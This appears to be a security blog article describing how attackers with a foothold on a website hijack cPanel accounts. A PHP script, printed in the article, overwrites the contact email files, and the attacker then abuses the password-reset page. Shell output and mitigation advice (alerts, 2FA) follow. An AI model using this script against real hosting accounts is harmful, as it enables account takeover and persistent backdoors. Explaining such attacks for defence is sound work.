Cracking a password is a simple process where we can get the data and passwords as well as the users personal information that can be breached by another computer system. So now this particular “Forgot your password” has helped users who have forgotten their password ,well however analysts says that it can result in bugs which can be helpful for the hackers.
Once the hacker gets the access he can easily use your cPanel’s “Forgot your password” to reset a user password and they gain access to your account to an already compromised website.
Experts says a malicious file on a website’s hosting environment, which has a simple method to change the cPanel user password, which then allows them further access to the hosting plan along with its associated websites. Hackers who can create an SSH or FTP type of files for user once they have gained access to the compromised environment, it clearly says even after the website is cleared of all malware &the password is reset, they can still be able to use the new SSH or FTP user to re-upload any malicious content removed during cleanup process.
Password Modification of cPanel
As the cPanel’s password hashes are stored in the Linux server this will be a major problem for the hackers because this can’t be modified by a malicious file as it would lack the ownership and need permissions. However to modify the password the hacker will use other ways to change password by changing the contact email address and it is read from a file within the cPanel users directory. Based upon the ownership and permissions, it can be modified by hacker by simply using a malicious file.
Updating Email Address of cPanel
Contacts email address completely depends upon the server configuration of cPanel and email address can exist in two different locations : /home/user/.contactemail and /home/user/.cpanel/contactinfo.
$user = get_current_user();
$site = $_SERVER[‘HTTP_HOST’];$ips = getenv(‘REMOTE_ADDR’);
if(isset($_POST[‘submit’])){
$email = $_POST[’email’];
$wr = ’email:’.$email;
$f = fopen(‘/home/’.$user.’/.cpanel/contactinfo’, ‘w’);
fwrite($f, $wr);
fclose($f);
$f = fopen(‘/home/’.$user.’/.contactemail’, ‘w’);
fwrite($f, $wr);
fclose($f);
$parm = $site.’:2083/resetpass?start=1′;
echo ‘<br/><center>’.$parm.'</center>’;
echo ‘<br/><center>’.$user.'</center>’;
After successful running of the malicious script above with a configured email address (e.g [email protected]) in the $_POST parameter, the two files .contactemail and .cpanel/contactinfo will be updated.
[root@cpanel]# pwd
/home/luke
[root@cpanel]# find . -name “*contact*” | xargs grep -ni “email”
./.contactemail:1:[email protected]
./.cpanel/contactinfo:2:”email”: ‘[email protected]’
As the email address has been successfully written into the user files .contactemail and .cpanel/contactinfo, the malicious user needs to submit a “forgot your password?” request. The “forgot your password?” process requires users to access the URL domain.com:2083/resetpass (2083 is the port used for cPanel HTTPS) and it will give you the cPanel username along with the corresponding cPanel contact email address that need to modified.
Once the information is submitted the cPanel server will send a security code to the contact email address which is used by the hacker to change the cPanel password and they can directly access the cPanel. So once the hacker gets access for the site, they can easily go through further layers of backdoors (e.g create additional FTP users).
Mitigation & Conclusion Steps
Few of us may be familiar with cPanel’s notification settings, which allows alerts to be sent in the event of specific setting modifications—like a contact email address or user password change.
This feature could help alert user in the event of an attacker changing the contact email address but this particular alert is only triggered when the change is requested from the cPanel user’s Contact Information page. When hacker submit modifications to the .cpanel/contactinfo file using the previously shown malware instead, the victim’s initial contact email address cannot be alerted and also Secondary contact email addresses configured in this manner can be removed during modification process for the primary contact email address.
So we conclude that the best way for an user to defend against this type of password reset attack is to enable 2FA authentication for their cPanel account.
